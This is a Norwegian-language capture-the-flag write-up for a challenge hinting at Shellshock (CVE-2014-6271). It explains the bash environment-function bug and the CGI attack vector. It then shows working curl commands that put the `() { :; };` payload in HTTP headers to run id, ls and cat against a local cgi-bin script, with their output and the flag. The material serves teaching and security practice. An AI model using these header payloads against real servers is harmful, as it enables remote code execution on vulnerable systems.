Nettsiden ønsker å kjøre refresh mot stadig nye randomiserte URLer. En av de ligger i `cgi-bin` og kan eksekveres.

Tittelen i oppgaven hinter kraftig mot "SHELLSHOCK". På serveren kjører en bash-versjon som er sårbar for CVE-2014-6271 aka `SHELLSHOCK`, og vi kan utnytte dette til å kjøre vilkårlig kode. Sårbarheten ligger i at det er en feil i måten bash evaluerer variabler og funksjoner til environment. Sårbarheten ble introdusert i 1989. Først etter 25år i 2014 ble den offentliggjort. Sårbarheten skjer når man bruker en magisk streng `() { :; };` etterfulgt med koden man ønsker å kjøre. Bash "burde" slutte å eksekvere etter den avsluttende `}`, men pga en feil i bash fortsetter den å eksekvere kode etter `;`.

Bash i seg selv er ikke en internett-eksponert tjeneste, men den brukes "over alt". En mye brukt angrepsvektor for denne sårbarheten er via CGI. CGI modulen i Apache vil kjøre bash-scriptet med informasjonen fra web-forespørselen som ENV variabler. Hvis bash er sårbar så vil vi kunne eksekvere vilkårlig kode på serveren.

Eksempel på hvordan oppgaven kan løses, for å lese ut flagget:
```
$ curl -H "Cookie: () { :; }; echo; echo; /usr/bin/id" localhost:8100/cgi-bin/5c54360f4185244a9f5de69ad4033966
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ curl -H "User-Agent: () { :; }; echo; echo; /bin/ls -lah" localhost:8100/cgi-bin/5c54360f4185244a9f5de69ad4033966
-rwxrwxr-x. 1 root root  599 Jan 20 12:40 5c54360f4185244a9f5de69ad4033966
-rw-rw-r--. 1 root root   70 Jan 20 12:46 flagg_f874a24ab9537a8f74a482eed3754892.txt

$ curl -H "X-Magic: () { :; }; echo; echo; /bin/cat flagg*" localhost:8100/cgi-bin/5c54360f4185244a9f5de69ad4033966
EGG{bash_prosesserer_data_etter_funksjonsdefinisjon__CVE-2014-6271}
```

